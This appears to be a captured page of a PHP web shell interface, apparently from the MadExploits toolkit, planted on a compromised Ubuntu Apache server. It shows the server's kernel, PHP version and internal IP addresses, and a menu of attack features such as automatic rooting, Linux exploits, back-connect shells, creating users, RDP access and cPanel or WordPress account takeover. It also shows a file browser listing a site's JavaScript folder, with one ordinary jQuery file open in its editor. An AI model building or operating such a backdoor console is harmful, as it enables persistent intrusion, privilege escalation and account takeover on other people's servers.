Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
admins /
sort /
docs /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap.min.js
58.6
KB
-rwxr-x--x
demo-build-table.js
5.47
KB
-rwxr-x--x
docs.js
7.98
KB
-rwxr-x--x
jquery-1.2.6.min.js
54.43
KB
-rwxr-x--x
jquery-1.4.4.min.js
76.76
KB
-rwxr-x--x
jquery-2.2.4.min.js
83.57
KB
-rwxr-x--x
jquery-latest.min.js
86.08
KB
-rwxr-x--x
jquery-migrate-3.1.0.min.js
8.78
KB
-rwxr-x--x
jquery-ui.min.js
247.72
KB
-rwxr-x--x
jquery.jui_theme_switch.min.js
3.62
KB
-rwxr-x--x
jquery.magnific-popup.min.js
20.44
KB
-rwxr-x--x
jquery.tipsy.min.js
4.38
KB
-rwxr-x--x
prettify.js
13.31
KB
-rwxr-x--x
rangeslider.min.js
6.25
KB
-rwxr-x--x
search-ie.js
864
B
-rwxr-x--x
search.js
10.78
KB
-rwxr-x--x
select2-3.4.6.min.js
62.49
KB
-rwxr-x--x
sugar.min.js
66.88
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : search-ie.js
/* IE 8 and less */ $(function(){ // open side menu var checked = false; $('.main-header').click(function(){ checked = !checked; $('#main-nav').animate({ width: checked ? 250 : 0 }, 300); $('#main') .animate({ marginLeft: checked ? 250 : 0 }, 300) .css({ overflow: checked ? 'hidden' : '' }) .find('.open-menu').toggle(!checked).end() .find('.close-menu').toggle(checked).end() .find('#banner h1').css({ paddingLeft : checked ? 0 : 30 }); }); // make sure the case insensitive button is checked (visually) $('#csfalse').addClass('switch-selection-right'); // search option buttons $('.switch-label').click(function(){ var tar = $(this).attr('for'); $('#' + tar) .prop('checked', true) .change() .siblings('.switch-selection') .toggleClass( 'switch-selection-right', (tar === 'letter' || tar === 'csfalse') ); }); });
Close